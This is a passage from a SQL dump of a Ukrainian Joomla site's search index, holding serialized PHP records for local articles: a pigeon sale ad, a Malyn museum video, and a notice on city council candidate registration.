:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"8\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:25:\"2467:molodi-poshtovi-bili\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:52:\"/index.php/holuby/poshtovi/2467-molodi-poshtovi-bili\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2467\";s:5:\"route\";s:80:\"index.php?option=com_content&view=article&id=2467:molodi-poshtovi-bili&catid=126\";s:5:\"title\";s:36:\"Молоді поштові білі\";s:11:\"description\";s:433:\" В наявності 4 молодих білих 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Хмельник, Овруч. Ціна 120, телефонуйте, домовимось. Фото голубів можна переглянути за посиланням : https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-bili \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-03 17:59:38\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-03 17:59:38\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4672,'index.php?option=com_content&view=article&id=2472','index.php?option=com_content&view=article&id=2472:nezabarom-novi-realijiji-malinshchini&catid=8','Незабаром нові реалії Малинщини',' ','2020-09-15 16:02:31','3b383fd8acf7b292a795f80d604b523a',1,1,1,'*','2020-09-15 13:02:01','0000-00-00 00:00:00','2020-09-15 13:02:01','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2472\";s:5:\"alias\";s:37:\"nezabarom-novi-realijiji-malinshchini\";s:7:\"summary\";s:169:\"		<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/0502.jpg\"><img src=\"https://malehus.in.ua/images/stories/0502.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-15 13:02:30\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:42:\"2472:nezabarom-novi-realijiji-malinshchini\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:64:\"/index.php/8-novini-2/2472-nezabarom-novi-realijiji-malinshchini\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2472\";s:5:\"route\";s:95:\"index.php?option=com_content&view=article&id=2472:nezabarom-novi-realijiji-malinshchini&catid=8\";s:5:\"title\";s:59:\"Незабаром нові реалії Малинщини\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-15 13:02:01\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-15 13:02:01\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4673,'index.php?option=com_content&view=article&id=2473','index.php?option=com_content&view=article&id=2473:malinskij-miskij-kraeznavchij-muzej-turistichna-mandrivka-malinom&catid=8','Малинський міський краєзнавчий музей: Туристична мандрівка Малином',' ','2020-09-15 20:51:15','95c5137eb651d2b28590aeb268862161',1,1,1,'*','2020-09-15 17:51:15','0000-00-00 00:00:00','2020-09-15 17:51:15','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2473\";s:5:\"alias\";s:65:\"malinskij-miskij-kraeznavchij-muzej-turistichna-mandrivka-malinom\";s:7:\"summary\";s:296:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/AnhNSWqcVV8\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-15 17:51:15\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:70:\"2473:malinskij-miskij-kraeznavchij-muzej-turistichna-mandrivka-malinom\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:92:\"/index.php/8-novini-2/2473-malinskij-miskij-kraeznavchij-muzej-turistichna-mandrivka-malinom\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2473\";s:5:\"route\";s:123:\"index.php?option=com_content&view=article&id=2473:malinskij-miskij-kraeznavchij-muzej-turistichna-mandrivka-malinom&catid=8\";s:5:\"title\";s:125:\"Малинський міський краєзнавчий музей: Туристична мандрівка Малином\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-15 17:51:15\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-15 17:51:15\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4678,'index.php?option=com_content&view=article&id=2475','index.php?option=com_content&view=article&id=2475:zareestrovano-352-kandidati-na-34-deputskikh-mandati-u-malinsku-misku-radu-korostenskogo-rajonu-zhitomirskoji-oblasti&catid=8','Зареєстровано 352 кандидати на 34 депутатських мандати у Малинську міську раду Коростенського району Житомирської області',' ','2020-09-29 21:04:05','54f38ba35d7bbd2d4621676503aeb11a',1,1,1,'*','2020-09-29 17:45:28','0000-00-00 00:00:00','2020-09-29 17:45:28','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2475\";s:5:\"alias\";s:117:\"zareestrovano-352-kandidati-na-34-deputskikh-mandati-u-malinsku-misku-radu-korostenskogo-rajonu-zhitomirskoji-oblasti\";s:7:\"summary\";s:171:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/vybory.jpg\"><img src=\"https://malehus.in.ua/images/stories/vybory.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-29 18:04:05\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:122:\"2475:zareestrovano-352-kandidati-na-34-deputskikh-mandati-u-malinsku-misku-radu-korostenskogo-rajonu-zhitomirskoji-oblasti\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super 